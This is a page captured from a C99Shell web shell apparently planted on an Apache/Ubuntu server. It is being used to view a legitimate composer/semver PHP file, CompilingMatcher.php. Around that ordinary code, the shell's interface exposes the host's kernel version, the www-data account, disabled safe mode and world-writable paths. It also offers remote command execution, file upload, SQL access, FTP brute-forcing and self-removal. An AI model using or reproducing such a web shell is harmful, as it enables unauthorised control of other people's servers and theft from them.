!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/composer/semver/src/   drwxrwxrwx
Free 13.34 GB of 57.97 GB (23.02%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     CompilingMatcher.php (1.96 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of composer/semver.
 *
 * (c) Composer <https://github.com/composer>
 *
 * For the full copyright and license information, please view
 * the LICENSE file that was distributed with this source code.
 */

namespace Composer\Semver;

use 
Composer\Semver\Constraint\Constraint;
use 
Composer\Semver\Constraint\ConstraintInterface;

/**
 * Helper class to evaluate constraint by compiling and reusing the code to evaluate
 */
class CompilingMatcher
{
    private static 
$compiledCheckerCache = array();
    private static 
$enabled;

    
/**
     * @phpstan-var array<Constraint::OP_*, string>
     */
    
private static $transOpInt = array(
        
Constraint::OP_EQ => '==',
        
Constraint::OP_LT => '<',
        
Constraint::OP_LE => '<=',
        
Constraint::OP_GT => '>',
        
Constraint::OP_GE => '>=',
        
Constraint::OP_NE => '!=',
    );

    
/**
     * Evaluates the expression: $constraint match $operator $version
     *
     * @param ConstraintInterface $constraint
     * @param int                 $operator
     * @phpstan-param Constraint::OP_*  $operator
     * @param string              $version
     *
     * @return mixed
     */
    
public static function match(ConstraintInterface $constraint$operator$version)
    {
        if (
self::$enabled === null) {
            
self::$enabled = !\in_array('eval'explode(','ini_get('disable_functions')), true);
        }
        if (!
self::$enabled) {
            return 
$constraint->matches(new Constraint(self::$transOpInt[$operator], $version));
        }

        
$cacheKey $operator.$constraint;
        if (!isset(
self::$compiledCheckerCache[$cacheKey])) {
            
$code $constraint->compile($operator);
            
self::$compiledCheckerCache[$cacheKey] = $function = eval('return function($v, $b){return '.$code.';};');
        } else {
            
$function self::$compiledCheckerCache[$cacheKey];
        }

        return 
$function($versionstrpos($version'dev-') === 0);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--